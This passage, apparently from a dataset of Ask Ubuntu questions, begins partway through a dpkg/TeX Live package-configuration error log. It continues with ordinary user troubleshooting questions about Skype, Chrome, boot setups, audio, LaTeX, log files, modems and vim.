please remove manually ! ignoring /etc/texmf/texmf.d/85misc.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/90texdoc.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/95nonpath.cnf during generation of texmf.cnf , please remove manually ! running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... updmap-sys failed . output has been stored in /tmp/updmap.zi5jpmdd please include this file if you report a bug . sometimes , not accepting conffile updates in /etc/texmf/updmap.d causes updmap-sys to fail . please check for files with extension .dpkg-dist or .ucf-dist in this directory dpkg : error processing package tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of latex-sanskrit : latex-sanskrit depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-sanskrit ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lmodern : lmodern depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package lmodern ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tex-gyre : tex-gyre depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already dpkg : error processing package tex-gyre ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-latex-base : texlive-latex-base depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-base ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-latex-recommended : texlive-latex-recommended depends on texlive-latex-base ( > = 2013.20130512 ) ; however : no apport report written because maxreports is reached already package texlive-latex-base is not configured yet . texlive-latex-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-recommended ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cm-super-minimal : cm-super-minimal depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . cm-super-minimal depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . dpkg : error processing package cm-super-minimal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cm-super : cm-super depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . cm-super depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . cm-super depends on cm-super-minimal ( = 0.3.4-9 ) ; however : package cm-super-minimal is not configured yet . dpkg : error processing package cm-super ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-metapost : texlive-metapost depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-metapost ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of context : context depends on texlive-metapost ( > = 2013 ) ; however : package texlive-metapost is not configured yet . context depends on lmodern ( > = 2.004.4 ) ; however : package lmodern is not configured yet . context depends on tex-gyre ; however : package tex-gyre is not configured yet . context depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package context ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of context-modules : context-modules depends on context ( > > 2011 ) ; however : package context is not configured yet . context-modules depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package context-modules ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-font-utils : texlive-font-utils depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-font-utils ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-extra-utils : texlive-extra-utils depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-extra-utils depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-extra-utils ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of feynmf : feynmf depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . feynmf depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . feynmf depends on texlive-font-utils ; however : package texlive-font-utils is not configured yet . feynmf depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . dpkg : error processing package feynmf ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kile : kile depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package kile ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-xcolor : latex-xcolor depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . latex-xcolor depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-xcolor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-beamer : latex-beamer depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . latex-beamer depends on latex-xcolor ( > = 2.00-1 ) ; however : package latex-xcolor is not configured yet . latex-beamer depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package latex-beamer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-common : latex-cjk-common depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . latex-cjk-common depends on texlive-font-utils ( > = 2007.dfsg.2-1 ) ; however : package texlive-font-utils is not configured yet . latex-cjk-common depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-chinese : latex-cjk-chinese depends on latex-cjk-common ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-chinese depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-chinese ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-japanese : latex-cjk-japanese depends on latex-cjk-common ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-japanese depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-japanese ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-korean : latex-cjk-korean depends on latex-cjk-common ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-korean depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-korean ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-other : texlive-lang-other depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-other ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-thai : latex-cjk-thai depends on latex-cjk-common ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-thai depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . latex-cjk-thai depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . latex-cjk-thai depends on texlive-lang-other ( > = 2013.20130523-1 ) ; however : package texlive-lang-other is not configured yet . dpkg : error processing package latex-cjk-thai ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-all : latex-cjk-all depends on latex-cjk-common ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-all depends on latex-cjk-chinese ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-chinese is not configured yet . latex-cjk-all depends on latex-cjk-japanese ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-japanese is not configured yet . latex-cjk-all depends on latex-cjk-korean ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-korean is not configured yet . latex-cjk-all depends on latex-cjk-thai ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-thai is not configured yet . dpkg : error processing package latex-cjk-all ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latexmk : latexmk depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package latexmk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of m-tx : m-tx depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package m-tx ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of musixtex : musixtex depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package musixtex ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of pmx : pmx depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . pmx depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package pmx ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of purifyeps : purifyeps depends on texlive-metapost ; however : package texlive-metapost is not configured yet . dpkg : error processing package purifyeps ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-recommended : texlive-fonts-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-recommended ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive : texlive depends on texlive-latex-recommended ( > = 2013.20130512 ) ; however : package texlive-latex-recommended is not configured yet . texlive depends on texlive-fonts-recommended ( > = 2013.20130512 ) ; however : package texlive-fonts-recommended is not configured yet . texlive depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-bibtex-extra : texlive-bibtex-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-bibtex-extra depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-bibtex-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-extra : texlive-fonts-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-extra-doc : texlive-fonts-extra-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-extra-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-recommended-doc : texlive-fonts-recommended-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-recommended-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-formats-extra : texlive-formats-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-formats-extra depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-formats-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-polish : texlive-lang-polish depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-lang-polish depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-polish ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-generic-extra : texlive-generic-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-generic-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-indic : texlive-lang-indic depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-indic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-spanish : texlive-lang-spanish depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-spanish ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-omega : texlive-omega depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-omega depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-omega ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-cyrillic : texlive-lang-cyrillic depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-lang-cyrillic depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-lang-cyrillic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-humanities-doc : texlive-humanities-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-humanities-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-english : texlive-lang-english depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-english ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of fragmaster : fragmaster depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . fragmaster depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . fragmaster depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . fragmaster depends on texlive-font-utils ; however : package texlive-font-utils is not configured yet . dpkg : error processing package fragmaster ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-extra-doc : texlive-latex-extra-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . . . . . . ( more errors here ! ! ! ! this is my edit to meet the maximum character limit allowed for a post on this forum ! ! ! ! ! ! ! ! ! ! ! ) . . . dpkg : error processing package texlive-science-doc ( -- configure ) : dependency problems - leaving unconfigured dpkg : too many errors , stopping no apport report written because maxreports is reached already errors were encountered while processing : tex-common latex-sanskrit lmodern tex-gyre texlive-latex-base texlive-latex-recommended cm-super-minimal cm-super texlive-metapost context context-modules texlive-font-utils texlive-extra-utils feynmf kile latex-xcolor latex-beamer latex-cjk-common latex-cjk-chinese latex-cjk-japanese latex-cjk-korean texlive-lang-other latex-cjk-thai latex-cjk-all latexmk m-tx musixtex pmx purifyeps texlive-fonts-recommended texlive texlive-bibtex-extra texlive-fonts-extra texlive-fonts-extra-doc texlive-fonts-recommended-doc texlive-formats-extra texlive-lang-polish texlive-generic-extra texlive-lang-indic texlive-lang-spanish texlive-omega texlive-lang-cyrillic texlive-humanities-doc texlive-lang-english fragmaster texlive-latex-extra-doc texlive-publishers-doc texlive-lang-european texlive-pictures-doc texlive-metapost-doc texlive-science-doc processing was halted because there were too many errors . e : sub-process /usr/bin/dpkg returned an error code ( 1 )
515128	skype and microphone in 14.04	i have done everything under the sun , the web cam is detected and the mic with the web cam also but skype does not give any options or drop down to select the web cam , very frustrating , the system is running great but having skype is important , funny when i was running linux mint i had no issues , might have to go back to mint
515129	how to change chrome bookmark bar font sizes	is there a way to change the font size of chrome web browser bookmark bar on linux ? it does't vary with zoom out and zoom in options .
515131	chrome os in triple boot with ubuntu ( elemntary os ) ( ubuntu gnome ) and windows 8.1	hi im wondering how to put/ install chrome os n hard drive with dual boot with ubuntu and windows 8.1 please i need help with this . i had follow some guides from here https : //sites.google.com/site/installationubuntu/chrome-os/make-your-own-chromium-os-notebook and http : //unix.stackexchange.com/questions/29283/install-chromium-os-without-usb-disk please contact me at facebook aniel arias or my email anielarias @ yahoo.com thank you
515135	dual screen in ubuntu ( one inside the other ) !	i recently migrated to ubuntu from windows . and for some strange reason the screen that boots up functions as though there are two different screens on the same monitor . since i am new to ubuntu i do n't have much knowledge so any help will be highly appreciated . thank you ! ps : visit http : //goo.gl/gyxtgr for image
515142	crackling sound from right laptop speaker	this problem lasts for several months already ( first on ubuntu 13.10 , and now on 14.10 ) . i get very loud cracking/popping sound from my right asus k56c 's speaker , i searched everything but could not get rid of it . several facts : there is no problem on windows 8 . it has nothing to do with applications running because it appears even before login screen of ubuntu . also same problem if i boot from live usb . muting sound will remove noise , but lowering volume has no effect . inserting any headphones , removes the noise . if i disconnect power cable while there is noise , noise will always disappear , but only if there is no music playing . if i start playing music , noise again appear even with power cable disconnected . sometimes that noise disappears for 1-4 weeks , and then again appears for no reason and lasts from several days to weeks . that noise is always the same , and i tried adding tsched=0 to /etc/pulse/default.pa . also tried this positionreporting fix , with no effect . i also tried disconnecting all the cables and removing all electronic devices around laptop , but it has no effect . i also tried removing pulse audio , did n't change anything . would be great if someone has some real solution for this problem .
515144	rendering cv template with xelatex	installed kubuntu on thursday installed latex on my kubuntu machine , using full compiled an old document and it worked fine downloaded a cv template from http : //www.latextemplates.com/template/two-column-one-page-cv compiled it , got error fatal fontspec error : `` can not -use-pdftex '' the fontspec package requires either xetex or luatex to function . you must change your typesetting engine to , e.g. , `` xelatex '' or `` lualatex '' instead of plain `` latex '' or `` pdflatex '' . see the fontspec documentation for further information . for immediate help type h . installed xelatex using this guide http : //ledgersmb.org/faq/xelatex i.e . 7 installed texlive-xetex that includes xelatex apt-get install texlive-xetex apt-get install liblatex- { driver , encode , table } -perl apt-get install libtemplate-plugin-latex-per 8 ) compiled cv template again , did not work . i got the same error as step 5 . related : no xelatex in texlive 2012 excuse me if my question is not clear enough , i 'm new to linux .
515146	very large log files , what should i do ?	( this question deals with a similar issue , but it talks about a rotated log file . ) today i got a system message regarding very low /var space . as usual i executed the commands in the line of sudo apt-get clean which improved the scenario only slightly . then i deleted the rotated log files which again provided very little improvement . upon examination i find that some log files in the /var/log has grown up to be very huge ones . to be specific , ls -lsh /var/log gives , total 28g -rw-r -- -- - 1 syslog adm 14g aug 23 21:56 kern.log -rw-r -- -- - 1 syslog adm 14g aug 23 21:56 syslog -rw-rw-r -- 1 root utmp 390k aug 23 21:47 wtmp -rw-r -- r -- 1 root root 287k aug 23 21:42 dpkg.log -rw-rw-r -- 1 root utmp 287k aug 23 20:43 lastlog as we can see , the first two are the offending ones . i am mildly surprised why such large files have not been rotated . so , what should i do ? simply delete these files and then reboot ? or go for some more prudent steps ? i am using ubuntu 14.04 . update 1 to begin with , the system is only several months old . i had to install the system from scratch couple of months back after a hard disk crash . now , as advised in this answer , i first checked the offending log files using tail , no surprise there . then , for deeper inspection , i executed this script from the same answer . for log in /var/log/ { syslog , kern.log } ; do echo `` $ { log } : '' sed -e 's/\ [ [ ^ ] ] \+\ ] // ' -e 's/ . * [ 0-9 ] \ { 2\ } : [ 0-9 ] \ { 2\ } : [ 0-9 ] \ { 2\ } // ' $ { log } \ | sort | uniq -c | sort -hr | head -10 done the process took several hours . the output was in the line of , /var/log/syslog : 71209229 rafid-hamiz-dell kernel : sda3 : rw=1 , want=7638104968240336200 , limit=1681522688 53929977 rafid-hamiz-dell kernel : attempt to access beyond end of device 17280298 rafid-hamiz-dell kernel : attempt to access beyond end of device 1639 rafid-hamiz-dell kernel : ext4-fs warning ( device sda3 ) : ext4_end_bio:317 : i/o error -5 writing to inode 6819258 ( offset 0 size 4096 starting block 54763121030042024 ) < snipped > /var/log/kern.log.1 : 71210257 rafid-hamiz-dell kernel : attempt to access beyond end of device 71209212 rafid-hamiz-dell kernel : sda3 : rw=1 , want=7638104968240336200 , limit=1681522688 1639 rafid-hamiz-dell kernel : ext4-fs warning ( device sda3 ) : ext4_end_bio:317 : i/o error -5 writing to inode 6819258 ( offset 0 size 4096 starting block 954763121030042024 ) ( /dev/sda3 is my home directory . as we can find , lsblk /dev/sda name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 122.1g 0 part / ├─sda2 8:2 0 7.6g 0 part [ swap ] └─sda3 8:3 0 801.8g 0 part /home why a process will want to write beyond the limit is actually outside the scope of my comprehension . perhaps i will want to ask a different question in this forum if this continues even after a system update . ) then , from this answer ( you may want to check this for a deeper understanding ) , i executed , sudo su - > kern.log > syslog now , these files have zero sizes . the system is running fine before and after a reboot . i will watch these files ( along with others ) in the next few days and report back should they behave out-of-line . as a final note , both the offending files ( kern.log and syslog ) , are set to be rotated , as inspection of the files ( grep helped ) inside /etc/logrotate.d/ shows . update 2 the log files are actually rotated . looks like the large sizes were attained on a single day .
515153	how does one run qml tests on a ubuntu touch phone ?	my application has qml tests using qttests that i run locally on the desktop via qmltestrunner . i am interested in running these tests on the device to simulate real conditions like the on-screen keyboard being visible and so on . how do i run it on the device ? as an example take the ubuntu clock app whose source code you can get by , bzr branch lp : ubuntu-clock-app on the desktop i run the tests by by , cd ubuntu-clock-app/tests/unit qmltestrunner -input tst_alarmlabel.qml ( inside tests/unit folder ) i pushed the source code to the ( phone , x86 emulator ) and tried running it by , adb push ubuntu-clock-app /tmp phablet-shell cd /tmp/ubuntu-clock-app/tests/unit qmltestrunner -input tst_alarmlabel.qml however i got the following crash , /usr/lib/arm-linux-gnueabihf/qt5/bin/qmltestrunner : invalid option -- 'i' /usr/lib/arm-linux-gnueabihf/qt5/bin/qmltestrunner : invalid option -- 'n' /usr/lib/arm-linux-gnueabihf/qt5/bin/qmltestrunner : invalid option -- 'p' /usr/lib/arm-linux-gnueabihf/qt5/bin/qmltestrunner : invalid option -- 'u' /usr/lib/arm-linux-gnueabihf/qt5/bin/qmltestrunner : invalid option -- 't' segmentation fault ( core dumped ) when trying to run without the -input parameter since it is not recognised , i got , phablet @ ubuntu-phablet : /tmp/tests/unit $ qmltestrunner tst_alarmlabel.qml segmentation fault ( core dumped ) note : i had to install qtdeclarative5-dev-tools and qtdeclarative5-test-plugin on the phone to get qmltestrunner and qtest 1.0 .
515154	stuck since i try to install dropbox	first of all i apologize for my english , but i 'm stuck and i do n't know much of linux . when i try to install dropbox in my ubuntu it get stuck and i try to close it , but know i have a serching ( applying changes ) on the progress tab in ubuntu software center . since i was trying to solve this i first use the comand sudo apt-get update and i get this : [ sudo ] password for mel : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? then i use this comands that i found in other fourum sudo killall -9 dpkg and update again , it works but at the end i get this : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . when i run sudo dpkg -- configure -a i get this setting up nautilus-dropbox ( 0.7.1-2 ) ... dropbox is the easiest way to share and store your files online . want to learn more ? head to http : //www.dropbox.com/ downloading dropbox ... 100 % and it get stuck again , please help
515155	teamviewer 9 on ubuntu server 14.04 : installs but will never log in and some buttons refuse to work	as the title says , teamviewer installs but the log in button on the right panel sometimes works , sometimes does n't ( as in clickable and not clickable ) . and when it does work , an error pops up after a minute or so and says `` sign in request failed ! the server did not respont . please try again . '' similarly , if i try to setup unattended access i can get as far as step 2 of 2 , but after entering i already have a teamviewer account and clicking next , nothing happens ... ever ...
515157	my touchpad on my asus k55n is not being detected	to preface this , i could n't get my fn keys to work for a few days after finally installing ubuntu and after a whole day of a black screen on start up , my fn keys starting working , but my trackpad stopped . i 've tried checking for it under $ xinput list but there is no touchpad that is being detected . i 've only had ubuntu for about a week so far and i 've had nothing but problems , so if anyone knows what 's wrong it would be greatly appreciated . i 'm running ubuntu 14.04 by the way .
515158	setting up modem with scanmodem	i opened terminal and ran lspci . here is the modem it found ... 03:05.0 communication controller : lsi corporation lucent v.92 data/fax modem i downloaded gnome ppp and went to set up the modem in it but it tells me none are found . i guess there is no driver installed so i started to follow the directions here ... https : //help.ubuntu.com/community/dialupmodemhowto/lucent/agere the linmodems.org is so out-of-date that the scanmodem tool can not even be downloaded from there . is there an alternative location to get this tool or is there another way to setup the modem for use ? output of `` sudo wvdialconf '' ... editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . ttys0 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttys0 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 115200 baud ttys0 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . modem port scan < *1 > : s1 s2 s3 s4 s5 s6 s7 s8 modem port scan < *1 > : s9 s10 s11 s12 s13 s14 s15 s16 modem port scan < *1 > : s17 s18 s19 s20 s21 s22 s23 s24 modem port scan < *1 > : s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial ( this link is dead ) i have no problem with buying a new dial-up modem if it supports voice , caller id , and fax along with internet . i need it mainly for telephone answering . would this be the best option for linux ? http : //www.rosewill.com/products/1164/productdetail_overview.htm
515159	esata pci card ubuntu 14.04	i want to get an esata pci card and i saw there are compatibility issues with linux . i use ubuntu 14.04 and i want to get this card . i have kernel version : 3.13.0-34-generic . i would like to know if this particular card is compatible with my system , if now how can i make it work .
515161	ubuntu 12.04 disable release notification of 14.04 in update manager	both my parents are still using ubuntu 12.04 and we do n't intent to upgrade to 14.04 in the near future . is it possible to disable the upgrade notification in update manager ? this because it 's just confusing for them . thanks , mattijs
515167	restrict access to windows system files	i have both ubuntu and windows 8 in my pc , i just want to make sure that i do n't accidentally delete windows files . is there a way to do so ? ? maybe a partition locking tool or anything . is there a way to restrict access to windows files by ubuntu users ?
515173	why do i get these .vimrc errors in ubuntu 14 after upgrade from ubuntu 13 ?	i get errors for all these commands when i try to use vim ( though vim then works ) : autocmd bufwritepre *.rb : % s/\s\+ $ //e set filetype off filetype plugin on filetype indent on syntax on `` turn on syntax highlighting match extrawhitespace /\s\+ $ / autocmd bufwinenter * match extrawhitespace /\s\+ $ / autocmd insertenter * match extrawhitespace /\s\+\ % # \ @ < ! $ / autocmd insertleave * match extrawhitespace /\s\+ $ / autocmd bufwinleave * call clearmatches ( ) let mapleader = `` , '' set foldmethod=indent `` fold based on indent set foldnestmax=10 `` deepest fold is 10 levels set nofoldenable `` dont fold by default set foldlevel=1 `` what i use let loaded_matchparen = 1 `` mdd turn off matching bracket `` ubuntu14 filetype plugin indent on `` required if i comment these lines out in my .vimrc i do n't get any errors . but i suspect i may have now 'lost ' those settings . is there a different form for them or something in vim in ubuntu 13 ? errors : three categories : sorry , the command is not available in this version option not supported unknown option details : $ vi .vimrc error detected while processing /home/durrantm/.vimrc : line 20 : e319 : sorry , the command is not available in this version : autocmd bufwritepre *.rb : % s/\s\+ $ //e line 24 : e519 : option not supported : filetype line 25 : e319 : sorry , the command is not available in this version : filetype plugin on line 26 : e319 : sorry , the command is not available in this version : filetype indent on line 27 : e319 : sorry , the command is not available in this version : syntax on `` turn on syntax highlighting line 37 : e319 : sorry , the command is not available in this version : match extrawhitespace /\s\+ $ / line 38 : e319 : sorry , the command is not available in this version : autocmd bufwinenter * match extrawhitespace /\s\+ $ / line 39 : e319 : sorry , the command is not available in this version : autocmd insertenter * match extrawhitespace /\s\+\ % # \ @ < ! $ / line 40 : e319 : sorry , the command is not available in this version : autocmd insertleave * match extrawhitespace /\s\+ $ / line 41 : e319 : sorry , the command is not available in this version : autocmd bufwinleave * call clearmatches ( ) line 48 : e319 : sorry , the command is not available in this version : let mapleader = `` , '' line 52 : e518 : unknown option : foldmethod=indent line 53 : e518 : unknown option : foldnestmax=10 line 54 : e518 : unknown option : nofoldenable line 55 : e518 : unknown option : foldlevel=1 line 57 : e319 : sorry , the command is not available in this version : let loaded_matchparen = 1 `` mdd turn off matching brac ket highlighting . line 58 : e319 : sorry , the command is not available in this version : filetype plugin indent on
515174	why does the spotify client render certain pages completely black ?	spotify starts up fine , but when navigating to certain sections of the app , instead of the expected content a black square is displayed . what is causing this issue and how can it be resolved ?
515177	google chrome wo n't launch	google chrome wo n't launch from its icon or from the terminal . ubuntu 12.04.5 lts google-chrome-stable version 36.0.1985.143-1 what the terminal spits out when i try to run google-chrome-stable : attention : default value of option force_s3tc_enable overridden by environment . [ 4384:4414:0823/105623 : error : gservices_settings.cc ( 103 ) ] setting not found : > checkin_interval segmentation fault ( core dumped ) things i 've tried : reinstalling chrome restarting computer ca n't find this particular error in the forums either . thanks in advance for any help .
